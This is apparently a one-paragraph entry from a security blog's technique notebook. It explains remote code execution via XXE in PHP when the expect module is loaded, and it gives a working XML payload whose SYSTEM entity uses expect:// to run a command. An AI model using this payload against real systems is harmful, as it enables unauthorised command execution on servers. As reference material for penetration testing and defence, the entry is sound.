Cardboard Iguana Security

/

spells

/

RCE via XXE in PHP

Saturday, June 14, 20251 min read

  • AttackCycle/Exploitation/XXE
  • Language/PHP
  • FileFormat/XML

If you’re dealing with PHP, and if the PHP expect module is loaded, and if XML inputs aren’t properly sanitized, then defining a SYSTEM entity with the value of expect://$COMMAND will get you RCE via XXE.

<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxerce SYSTEM "expect://id">]>
<root>&xxerce;</root>

Don’t expect to run into this often however, as this combination of factors is pretty rare.


Backlinks

  • PHP
  • XML external entity (XXE) attacks

Graph View

Created with Quartz v4.5.1 © 2025

  • Home
  • Resume
  • Contact
  • RSS Feed